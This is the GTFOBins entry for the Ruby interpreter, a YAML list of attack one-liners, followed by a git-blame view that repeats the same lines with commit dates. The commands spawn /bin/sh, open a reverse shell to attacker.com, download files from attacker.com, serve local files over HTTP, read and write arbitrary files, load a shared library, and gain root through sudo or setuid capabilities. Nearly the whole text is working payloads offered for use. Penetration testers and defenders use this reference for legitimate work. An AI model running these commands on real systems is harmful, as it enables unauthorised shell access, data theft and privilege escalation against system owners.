GTFOBins.github.io/_gtfobins/ruby.md

---
functions:
  shell:
    - code: ruby -e 'exec "/bin/sh"'
  reverse-shell:
    - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
  file-upload:
    - description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
      code: |
        export LPORT=8888
        ruby -run -e httpd . -p $LPORT
  file-download:
    - description: Fetch a remote file via HTTP GET request.
      code: |
        export URL=http://attacker.com/file_to_get
        export LFILE=file_to_save
        ruby -e 'require "open-uri"; download = open(ENV["URL"]); IO.copy_stream(download, ENV["LFILE"])'
  file-write:
    - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("DATA") }'
  file-read:
    - code: ruby -e 'puts File.read("file_to_read")'
  library-load:
    - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
  sudo:
    - code: sudo ruby -e 'exec "/bin/sh"'
  capabilities:
    - code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'
---
First commit 2018-05-21 21:14:41 +02:00			`---`
			`functions:`
Adopt new function names 2018-10-05 19:55:38 +02:00			`shell:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- code: ruby -e 'exec "/bin/sh"'`
Adopt new function names 2018-10-05 19:55:38 +02:00			`reverse-shell:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
			`code: \|`
			`export RHOST=attacker.com`
			`export RPORT=12345`
			`ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){\|io\|c.print io.read}end'`
Adopt new function names 2018-10-05 19:55:38 +02:00			`file-upload:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.`
			`code: \|`
			`export LPORT=8888`
			`ruby -run -e httpd . -p $LPORT`
Adopt new function names 2018-10-05 19:55:38 +02:00			`file-download:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- description: Fetch a remote file via HTTP GET request.`
			`code: \|`
Use shorten ruby file download from #44 2019-01-02 16:28:13 +01:00			`export URL=http://attacker.com/file_to_get`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`export LFILE=file_to_save`
Use shorten ruby file download from #44 2019-01-02 16:28:13 +01:00			`ruby -e 'require "open-uri"; download = open(ENV["URL"]); IO.copy_stream(download, ENV["LFILE"])'`
Add read and write to python and ruby 2018-05-28 19:25:55 +02:00			`file-write:`
Use DATA as a placeholder for file-write operations 2018-08-20 14:35:43 +02:00			`- code: ruby -e 'File.open("file_to_write", "w+") { \|f\| f.write("DATA") }'`
Reorder functions in binaries 2018-07-04 20:26:52 +02:00			`file-read:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- code: ruby -e 'puts File.read("file_to_read")'`
Adopt new function names 2018-10-05 19:55:38 +02:00			`library-load:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'`
Adopt new function names 2018-10-05 19:55:38 +02:00			`sudo:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- code: sudo ruby -e 'exec "/bin/sh"'`
Adopt new function names 2018-10-05 19:55:38 +02:00			`capabilities:`
Add capabilities to perl, php, python3, and ruby 2018-09-12 22:57:04 +02:00			`- code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'`
Fix trailing spaces 2018-05-25 01:10:39 +02:00			`---`